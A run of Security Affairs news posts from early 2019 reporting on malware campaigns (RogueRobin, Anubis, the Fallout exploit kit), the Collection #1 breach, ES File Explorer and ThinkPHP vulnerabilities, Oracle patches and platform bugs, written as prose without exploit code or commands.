Posts by CSECybSec

Security experts attributed new malicious campaigns to the DarkHydrus APT group (aka Lazy Meerkat), threat actors used a new variant of the RogueRobin Trojan and leveraged Google Drive as an alternative C2 channel.

DarkHydrus was first discovered by experts at Palo Alto Networks’ Unit 42 team in July when the group carried out attacks aimed at a government agency in the Middle East.

Threat actors focused their activity in the Middle East, they used weaponized Microsoft Excel documents to compromise victims’ systems.

On January 9, experts at 360’s Threat Intelligence Center (360 TIC) first observed attacks leveraging lure Excel documents written in Arabic.

“This malware is a lure Excel document with name ‘الفهارس.xlsm’. When it is opened, embedded VBA macro is trigged to run. That macro drops 12-B-366.txt to ‘%TEMP%’ directory first, then leverages regsvr32.exe to run 12-B-366.txt “reads the analysis published by TIC.

The final stage malware is a backdoor written in C#.

According to the analysis made by malware researchers from Palo Alto Networks, the text file includes parts of a Windows Script Component (.SCT) file that once concatenated delivers a version of the RogueRobin trojan.

“The New_Macro function starts by concatenating several strings to create a PowerShell script that it will write to the file %TEMP%WINDOWSTEMP.ps1. The function builds the contents of a second file by concatenating several strings together, but this second file is a .sct file that the function will write to a file %TEMP%12-B-366.txt.” reads the analysis published by PaloAlto Networks.

“While .sct files are used by a multitude of applications, in this instance it is being used as a Windows Script Component file. The function then uses the built-in Shell function to run the following command, which effectively executes the .sct file stored in 12-B-366.txt“

The samples of the RogueRobin Trojan analyzed by Palo Alto Networks implement additional functionality, they include the use of Google Drive API. This new feature allows the attackers to use Google Drive as an alternative Command and Control channel and make hard the detection of malicious traffic.

The main communication channel with the C2 server is the DNS tunneling.

“A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode. This command is particularly interesting as it enables an alternative command and control channel that uses the Google Drive API.” continues Palo Alto Networks. “The x_mode command is disabled by default, but when enabled via a command received from the DNS tunneling channel, it allows RogueRobin to receive a unique identifier and to get jobs by using Google Drive API requests.”

Once activated, the malware will receive via DNS tunneling from the C2 server a list of settings that allows it to interact with the Google Drive.

The commands are exchanged leveraging a file uploaded by the Trojan to Google Drive, every change to the is interpreted as a command.

The RogueRobin Trojan also checks is it is running in a virtualized environment or a sandbox before triggering the payload.

According to Palo Alto Networks, the malware also checks for common analysis tools running on the system and the presence of a debugger.

“Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co. The domain is legitimate and owned by Google. The subdomain 676f6f646c75636b is a hex encoded string which decodes to goodluck.” states Palo Alto Networks.

Experts speculate the DarkHydrus group continues its operations and improved its techniques and its arsenal. The recent attacks show DarkHydrus group is abusing open-source penetration testing techniques such as the AppLocker bypass. 

Further information, including IoCs for the malware used by the group, are reported in the analysis published by both 360 TIC and Palo Alto Networks.

Pierluigi Paganini

(SecurityAffairs – hacking, DarkHydrus)

The post DarkHydrus adds Google Drive support to its RogueRobin Trojan appeared first on Security Affairs.

Cybersecurity expert Marco Ramilli has analyzed the huge trove of data, called Collection #1, that was first disclosed by Troy Hunt.

Few weeks ago I wrote about “How Data Breaches Happen“, where I shared some public available “pasties” within apparently (not tested) SQLi vulnerable websites. One of the most famous data breaches in the past few years is happening in these days. I am not saying that the two events are linked, but I have fun in thinking that events happen in bursts. Many magazines all around the world wrote about the data breach (Collection #1) published by Troy Hunt on 773 Millions of new Records (here). Today I’d like to write a quick partial analysis that I’ve been able to extract from those records (I grabbed data from public available pasties website). First of all, let me say that the work done has been super difficult (at least to me) since it required a huge amount of computational power and very high-speed internet access because of the humongous collected data. In order to make analysis over such a humongous data breach, I used a powerful Elastic Search Cloud instance and I wrote a tiny python script to import super dirty data into a common format. Some records were unable to load since the format type, the charset or whatever it had, so please consider a relative error about 4 to 5 % (circa) in the following data analyses.

PARTIAL Analysis of Collection #1

One of the first questions I wanted to answer was: “What are the most used passwords ?“. I am aware that many researches wrote about the most used passwords, but now I do have the opportunity to measure it. To get real used passwords and to evaluate the reality. So let’s see what are the most used passwords out there!

Collection #1 PARTIAL Analysis on used passwords

So far the most used passwords are: “123456”, “q1w2e3r4t5y6”, “123456789”, “1qaz2wsx3edc”, followed by most common passwords like “12345678” and “qwerty”. By observing the current graph and comparing it to common researches on frequently used passwords such as herehere, and here we might appreciate a significative difference: the pattern complexity! In fact, while years ago the most used passwords were about names, dates or simple patters such as “qwerty”, today we observe a significative increase in pattern complexity, but still too easy to be brute-forced.

A second question came by looking at leaked emails. “What are the domain names of the most leaked emails ?” Those domains are not the most vulnerable domains but rather the most used ones. So I’m not saying that those domains are/or have been vulnerable or Pwned, but I am trying to find what are the most leaked email providers. In other words if you receive an email from “” what is the probability that it has been leaked and potentially compromised ? Again I cannot answer to such a question since I do not have the total amount of “” accounts all around the word, but I think it might be a nice indicator to find out what are the most leaked email domain names.

PARTIAL Analysis on most leaked domain

The most leaked emails come from “”, “”, “” and “”. This is quite interesting since we are mostly facing personal emails providers (domains) rather then professional emails providers (such as So apparently, attackers are mostly focused in targeting people rather then companies (maybe attacking not professional websites and/or distributing malware to people rather then companies domain names). Another interesting data to know is about the unique leaked email domain names: 4426, so far !

Finally, it would be great to know from what sources data is coming from ! At such a point I have no evidences of what I am going to write about, but I made some deductions from the data leaked structure. The following image shows collection-1 structure.

PARTIAL Analysis Collection#1 Structure

Each folder holds .TXT files which have names that look like domain names. Some of those are really domain names (tested), some other are on-sale right now, and many other seem to just look like a domain, but I had no evidence of them. Anyway, I decided to assume that the file names looking like domain names are the domain from which the attacker leaked information. So, having such in mind we might deduce where the attacker extracted the data (username and passwords) and perform a personal evaluation about the leaked information.

Are you interested in Marco Ramilli’ conclusions? Give a look at his post:

Pierluigi Paganini

(SecurityAffairs – hacking, collection #1)

The post “Collection #1” Data Breach Analysis – Part 1 appeared first on Security Affairs.

Paying attention to cybersecurity is more important than ever in 2019. But, some companies are still unwilling to devote the necessary resources to securing their infrastructures against cyberattacks, and naive individuals think they’re immune to the tactics of cybercriminals, too.

For people who still need some convincing that cybersecurity is an essential point of focus, here are six reasons.

1. The Average Cost of a Cyberattack Exceeds
$1 Million

It’s no surprise that cyberattacks are costly, but some people will
likely be shocked at the massive expenses that could result. According to a recent report
from Radware
, the total costs are more than $1 million.
Additionally, victims report issues not directly related to financial losses,
such as decreases in productivity or negative customer experiences.

Based on the above statistic, enterprises should conclude that although
it costs money to invest in cybersecurity strategies, the expenses could be
more substantial if organizations choose not to put enough of their resources
toward experts and tools that minimize threats.

2. The U.S. Government Says It’s Time to Come
Up With a Better Plan

The U.S. government, as well as the authorities from other nations,
continually struggle to safeguard against digital attacks from rivals. The
challenges are so immense that government bodies and officials warn that the
United States needs an improved way
to stop adversaries

A State Department report warned that the country is increasingly
dependent on networked information systems, and foes from other nations have
learned to exploit that dependence and use it to disrupt the lives of

Most people who live in the U.S. can at least imagine the consequences
of a severe cyber attack that affected the country’s ability to proceed with
normal operations. Since government authorities researched the possibility and
asserted there’s no time to waste in coming up with an improved approach to
cybersecurity, that’s all the more reason to take action this year.

3. The Methods of Attack Are Diversifying

A decade or so ago, people typically felt sufficiently secure online by
installing anti-virus software on their computers. That’s still a worthy
precaution to take, but it’s no longer adequate for preventing all or even most
of the attacks a hacker might try.

According to a 2014 report, cybercriminals orchestrated 75
percent of attacks
through publicly known software vulnerabilities.
But, they also try to gain people’s credentials through phishing attacks, lock
down their systems with ransomware or infiltrate poorly secured connected
devices to name but a few possibilities.

People have a growing number of ways to use technology and rely on
connected devices, but that also means the likelihood goes up for potentially
unfamiliar kinds of attacks. Focusing on cybersecurity this year requires, in
part, understanding the most recent and common types of threats and protecting
networks against them.

4. Recent Breaches Victimized Millions

Equifax and Starwood/Marriott dealt with breaches that compromised the data of well over 100 million victims. The earlier revelation about the financial costs of cyber attacks is damning in itself, but it’s crucial for brands — and consumers themselves — to recognize that data breaches can be unintentional or malicious, but in any case, they could affect millions of people.

Then, affected companies have to engage in damage control in an attempt
to restore lost trust. Even when those entities put forth the effort, they may
still find that customers behave differently following breaches.

More specifically, an April 2018
study examined the connection
between consumer trust and
spending. It involved respondents giving a trust score to businesses. The
survey revealed that 15 percent of low-trust customers decreased how much they
spent at companies. But, in cases of high instances of trust, the decrease in
consumer spending was only 4 percent.

5. It Takes Months to Identify and Contain

If a person or business has a significant water leak in a well-used
area, the problem is usually easy to spot and fix. But, it’s typically not so
straightforward with cyber-related issues.

Research from 2018
published by IBM
found that, on average, it takes 197 days to
identify a breach and 69 days to contain it. Those timeframes give hackers
plenty of time to do damage that may prove irreparable. Then, once headlines
indicate how long a breach remained unnoticed, the reputational damage could be
severely harmful, too.

Making cybersecurity a focal point this year could minimize the time
spent looking for areas of concern within a network, especially if using
artificial intelligence-based strategies that learn normal conditions and give
warnings about deviations.

6. Cybercrime Is Extremely Profitable

Some criminals alter their methods once it becomes apparent that their
current wrongdoings are no longer profitable. But, that probably won’t happen
for a while concerning online-based crimes. Research from a criminology expert
published in April 2018 highlighted how the worldwide revenues from cybercrime
are at least 1.5
trillion annually

The investigation talked about how cybercrime represents an
interconnected web of profit possibilities with blurred lines between legal and
illegal activities. If people don’t fight back against online criminals at both
personal and organizational levels, hackers will have more opportunities than
ever to continue making income while others suffer.

Failing to Focus on Cybercrime This Year
Could Cause an Assortment of Issues

This list highlights some of the most prominent reasons why it’s essential to make cybersecurity a priority in 2019. Hackers get progressively more skilled at carrying out attacks, and they can cause significant catastrophes on unprotected or poorly defended

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – 2019 Cybersecurity predictions, cyberattacks)

The post 6 Reasons We Need to Boost Cybersecurity Focus in 2019 appeared first on Security Affairs.

A bug in Microsoft partner portal ‘exposes ‘ support requests to all partners, fortunately, no customer data was exposed.

The Register in exclusive reported that Microsoft partner portal ‘exposed ‘every’ support request filed worldwide.’ Tickets submitted from all over the world were exposed to all Microsoft support partners due to the glitch.

“At the moment in the Microsoft Partner Portal you can see every ticket title for every support request worldwide!” Stuart Crane of IT biz Everon told The Register.

Microsoft partner

“Another Microsoft small biz specialist contacted us to say “Logged on to my Microsoft Partner portal to check status of a ticket I have open with them only to see lots of tickets which are not ours”.” reported The Register.

According to another Microsoft partner quoted by The Register, the bug exposed case number and title of the tickers, but not their content. This means that the problem will not cause Microsoft big problems with data protection laws or watchdogs.

Microsoft quickly addressed the flaw and downplayed the issue explaining that only a limited number of features in the Partner Centre portal were affected.

“We’ve addressed an issue that impacted a small subset of functions on our Partner Centre portal and we’re working to restore normal operation.”
said a spokesperson for Microsoft.

Pierluigi Paganini

(SecurityAffairs – Microsoft partner portal, data leak)

The post A bug in Microsoft partner portal ‘exposes ‘ support requests to all partners appeared first on Security Affairs.

Security expert Robert Baptiste (akaElliot Alderson) discovered a vulnerability (CVE-2019-6447) in the ES File Explorer that potentially expose hundreds of million Android installs.

The ES File Explorer is an Android file manager that has over 100,000,000 installs and more than 500 million users worldwide according to its developer.

Baptiste discovered that the application uses a local HTTP server that listen on the open port 59777.

The expert noticed that even is the app is closed the server will still run until the user will kill all the background services of ES File Explorer

An attacker can connect the server and retrieve many device info, including the list of installed apps. The scary aspect of the flaw is that a remote attacker can get a file from the victim’s device and launch an app on the phone.

“The ES File Explorer File Manager application through for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network.” reads the description provided by the Mitre.

“This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.”

The attack works even if the victim will not actually grant the app any permissions on the Android device.

Baptiste published by PoC code on GitHub that could be used by an attacker that share the same Wi-Fi network to use to list and download files from the victim’s device and SD card, and launch apps and view device information.

With the following Proof Of Concept (POC), you can:

  • List all the files in the sdcard in the victim device
  • List all the pictures in the victim device
  • List all the videos in the victim device
  • List all the audio files in the victim device
  • List all the apps installed in the victim device
  • List all the system apps installed in the victim device
  • List all the phone apps installed in the victim device
  • List all the apk files stored in the sdcard of the victim device
  • List all the apps installed in the victim device
  • Get device info of the victim device
  • Pull a file from the victim device
  • Launch an app of your choice
  • Get the icon of an app of your choice

As reported by Bleeping Computer, a few hours after Baptiste disclosure the CVE-2019-6447 flaw, the cybersecurity expert Lukas Stefanko from ESET announced the discovery of another local vulnerability in ES File Explorer.

A local attacker could exploit this second flaw to carry out a Man-In-The-Middle (MitM) attack that will allow it to intercept the app’s HTTP network traffic and exchange it with his own.

ES File Explorer versions up to are affected by this MitM flaw.

At the time the ES File Explorer’s development team announced the fix for “the http vulnerability issue,” but there are other bugs to fix.

Pierluigi Paganini

(SecurityAffairs – Liberia, DDoS)

The post ES File Explorer vulnerabilities potentially impact 100 Million Users appeared first on Security Affairs.

Experts at Malwarebytes have reported that the code for the recently discovered Flash zero-day flaw was added to the Fallout Exploit kit.

Experts at Malwarebytes observed a new version of the Fallout Exploit kit that include the code to exploit a recently discovered Flash zero-day vulnerability.

The Fallout Exploit kit was discovered at the end of August by the threat analyst nao_sec, at the time it was used to distribute the GandCrab ransomware and other malicious codes, including droppers and potentially unwanted programs (PUPs).

First detailed in September 2018, the toolkit was observed delivering malware families ranging from ransomware to backdoors, but also fingerprinting the browser profile to identify targets of interest.

The activity associated with the Fallout exploit kit was temporarily suspended in early January, likely to improve it, in the same period experts at Malwarebytes observed an increase in the RIG EK activity.

The Fallout EK was distributed mainly via malvertising chains, starting January 15 it was used to deliver the GandCrab ransomware.

“After a short hiatus in early January, the Fallout exploit kit is back in business again with some new features for the new year.” reads the post published by Malwarebytes.

“The revised Fallout EK boasts several new features, including integration of the most recent Flash Player exploit. Security researcher Kafeine identified that Fallout is now the second exploit kit to add CVE-2018-15982.”

One of the most important improvements for the Fallout Exploit kit is the exploit for a recently discovered Adobe Flash Player zero-day tracked as

The CVE-2018-15982 flaw is a critical use-after-free bug that was exploited by an advanced persistent threat actor in attacks aimed at a healthcare organization associated with the Russian presidential administration.

The flaw could be exploited by attackers to execute arbitrary code, Adobe addressed it with the release of Flash Player for Windows, macOS, Linux, and Chrome OS.

The first exploit kit that integrated the code to trigger the CVE-2018-15982 flaw in mid-December was Underminer.

The new Fallout Exploit kit implements the support for HTTPS support, a new landing page format, and uses Powershell to run the final payload.

Fallout Exploit kit

“The Base64 encoded Powershell command calls out the payload URL and loads it in its own way” continues the analysis. ”
“This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload.”

The new development for the Fallout Exploit kit demonstrates the malware developers continously monitor

This development is the proof that exploit kit developers are continuously improving their code to trigger the most recent flaws.

Pierluigi Paganini

(SecurityAffairs – Fallout Exploit kit, cybercrime)

The post Fallout Exploit Kit now includes exploit for CVE-2018-15982 Flash zero-day appeared first on Security Affairs.

Security experts from Trend Micro have recently spotted two Android apps that use the motion sensor to evade detection and spread the Anubis banking Trojan.

Malware authors continue to improve their malicious apps to avoid detection and infect the largest number of users.

Security experts from Trend Micro have recently spotted two Android apps in the Google Play Store, Currency Converter and BatterySaverMobi, that infected thousands of users with banking malware.

motion sensor data anubis

Currency Converter masquerade as a currency exchange app and
BatterySaverMobi as a battery saver app, both use motion-sensors of infected Android devices to evade detection. The inputs from the sensors are used before installing a banking Trojan dubbed Anubis.

With this trick, vxers attempt to avoid detection because the malicious code is able to detect the absence of the motion sensor in the emulators used by researchers to detect the malware.

“We looked into this campaign and found that the apps dropped a malicious payload that we can safely link to the known banking malware Anubis (detected by Trend Micro as ANDROIDOS_ANUBISDROPPER ).”
“These apps don’t just use traditional evasion techniques; they also try to use the user and device’s motions to hide their activities. ” reads the analysis published by Trend Micro.

“As a user moves, their device usually generates some amount of motion sensor data. The malware developer is assuming that the sandbox for scanning malware is an emulator with no motion sensors, and as such will not create that type of data. If that is the case, the developer can determine if the app is running in a sandbox environment by simply checking for sensor data.”

The infection process doesn’t start if the malware determines that the device and the user are still by analyzing the sensor data.

If the app discovers the sensor data it runs the malicious code and then attempts to trick the victims into downloading and installing the Anubis payload APK with a fake system update. masquerading it as a “stable version of Android.”

If the user accepts the bogus system update, the dropper uses requests and responses over legitimate services such as Twitter and Telegram downloads the Anubis banking Trojan from the C2 and install it.

“Then, it registers with the C&C server and checks for commands with an HTTP POST request. If the server responds to the app with an APK command and attaches the download URL, then the Anubis payload will be dropped in the background.” continues the analysis.

Experts pointed out the Anubis banking Trojan uses a built-in keylogger to steal credentials and it is also able to take screenshots of the users’ screen while inserting credentials into any banking app.

Experts observed infections in 93 different countries, the latest variant of the Anubis banking Trojan targets at least 377 variations of financial apps.

The banking Trojan is also able to access to contact lists and location, send spam messages to contacts, call numbers from the device, record audio, and alter external storage.

Further details on the malware, including IoCs are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Anubis banking Trojan, motion sensor)

The post Android apps use the motion sensor to evade detection and deliver Anubis malware appeared first on Security Affairs.

Oracle released the first critical patch advisory for 2019 that addresses a total of 284 vulnerabilities, 33 of them are rated “critical”.

Let’s give a close look at some of the vulnerabilities fixed by this patch advisory.

The advisory fixed the CVE-2016-1000031 flaw, a remote code execution (RCE) bug in the Apache Commons FileUpload,  disclosed in November last year. The Commons FileUpload library is the default file upload mechanism in Struts 2, the CVE-2016-1000031 was discovered two years ago by experts at Tenable.

The bug affected the OCA’s Diameter Signalling Router component and its Communications Services Gatekeeper. The flaw also affected the Financial Services Analytical Applications Infrastructure, the Fusion Middleware MapViewer, and four three Oracle Retail components.

A vulnerability in the Apache Log4j tracked as CVE-2017-5645 impacted the Oracle’s Converged Application Server – Service Controller, the OCA Online Mediation Controller Service Broker, the WebRTC Session Controller, the FLEXCUBE component in Oracle Financial Services Applications, the Fusion’s GoldenGate app adapters and SOA Suite, and also a Sun tape library component.

The CVE-2017-5645 flaw resides in the Codehaus versions of Groovy and affected OCA Unified Inventory Management.

The critical patch advisory for 2019 also fixed the CVE-2018-11776 vulnerability in the OCA’s Communications Policy Management Component, this issue was exploited in 2018 by threat actors to mine cryptocurrency.

Oracle also addressed an arbitrary file upload flaw (CVE-2018-9206) in the OCA’s Services Gatekeeper that also impacted Primavera P6 in the Construction and Engineering Suite, and Siebel CRM.

Another bug fixed by Big Red affected the Oracle E-Business’ Performance Management component, it was in CVE-2019-2453:

“Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Performance Management.” reads the description provided by

“Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Performance Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Performance Management accessible data. “

Oracle addressed the CVE-2016-4000 flaw, Jython provided a vector for arbitrary code, it is used by Oracle Enterprise Manager platform, Banking Platform, and Utilities Network Management System.

The list is very long, it also includes patches for a DoS in the Derby
Apache tool used in the WebLogic server (CVE-2015-1832) and an RCE bug in the Spring framework used by Oracle Tuxedo and the Sun Tape Library ACSLS component.

People interested in the full list could visit the following address:

Pierluigi Paganini

(SecurityAffairs – hacking, critical patch advisory)

The post Oracle critical patch advisory addresses 284 flaws, 33 critical appeared first on Security Affairs.

A bug in the Twitter app for Android may have had exposed tweets, the social media platform revealed on Thursday.

The bug in the Android Twitter app affects the “Protect my Tweets” option from the account’s “Privacy and safety” settings that allows viewing user’s posts only to approved followers.

People who used the Twitter app for Android may have had the protected tweets setting disabled after they made some changes to account settings, for example after a change to the email address associated with the profile.

“We’ve become aware of an issue in Twitter for Android that disabled the “Protect your Tweets” setting if certain account changes were made.” reads the security advisory published by the company.

“You may have been impacted by this issue if you had protected Tweets turned on in your settings, used Twitter for Android, and made certain changes to account settings such as changing the email address associated with your account between November 3, 2014, and January 14, 2019.”

The vulnerability was introduced on November 3, 2014, and was fixed on January 14, 2019, users using the iOS app or the web version were not impacted. 

Twitter has notified impacted users and has turned “Protect your Tweets” back on for them if it was disabled.

“We are providing this broader notice through the Twitter Help Center since we can’t confirm every account that may have been impacted. We encourage you to review your privacy settings to ensure that your ‘Protect your Tweets’ setting reflects your preferences,” continues the advisory.

Recently Twitter addressed a similar bug, in December the researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party.

In September 2018, the company announced that an issue in Twitter Account Activity API had exposed some users’ direct messages (DMs) and protected tweets to wrong developers.

Twitter is considered one of the most powerful social media platforms, it was used in multiple cases by nation-state actors as a vector for disinformation and propaganda.

In December Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

Pierluigi Paganini

(SecurityAffairs – Twitter app, Android)

The post Twitter fixed a bug in its Android App that exposed Protected Tweets appeared first on Security Affairs.

Threat actors in the wild are leveraging a recently discovered flaw in the ThinkPHP PHP framework to install cryptominers, skimmers, and other malware.

Multiple threat actors are leveraging a recently discovered code execution vulnerability (CVE-2018-20062) in the ThinkPHP framework.

The flaw was already addressed by the Chinese firm TopThink that designed the framework, but security expert Larry Cashdollar at
Akamai’s Security Incident Response Team has now discovered active exploits of the flaw in the wild.

Cashdollar was investigating a recent Magecart campaign when discovered a new strain of malware.

“While investigating the recent Magecart card skimming attacks, I came across a payload I was not familiar with.  Further research into it lead me to discover that in December a researcher disclosed a remote command execution vulnerability in ThinkPHP, a web framework by TopThink.” reads the analysis published by the expert.

“The developers fixed the vulnerability stating that because “the framework does not detect the controller name enough, it may lead to possible ‘getshell‘ vulnerabilities without the forced routing enabled.”

Multiple attackers are using relatively simple techniques to trigger the issue, according to Cashdollar, they can leverage a single line of code to scan for the flaw.

Once discovered the flaw, the attackers could use publicly available code to exploit it and install several malicious codes.
Cashdollar said that in one case, threat actors exploited the flaw to deliver a varian of the Mirai bot.

“There are multiple actors abusing this flaw to install everything from a Mirai like botnet to Microsoft Windows malware. ” continues the post.

The analysis of sample from the last 7 days revealed that the majority of IP addresses are from the Asia Pacific region where the ThinkPHP framework is most popular.

ThinkPHP flaw

Cashdollar confirmed that threat actors are actively scanning systems across the world.

To secure your system update the framework to the current version.

“There is so much attack traffic, and so many ways to hide, criminals no longer worry about the tracks they’ve left behind. The goal now is to get command execution as any user, on any type of system, to either spread a botnet, distribute malware, or mine cryptocurrency.” concludes the expert.

“We will see more cross-pollination of command execution vulnerabilities in web apps, enterprise software, and IoT devices being used against multiple target platforms.”

Pierluigi Paganini

(SecurityAffairs – hacking, ThinkPHP)

The post Attacks in the wild leverage flaw in ThinkPHP Framework appeared first on Security Affairs.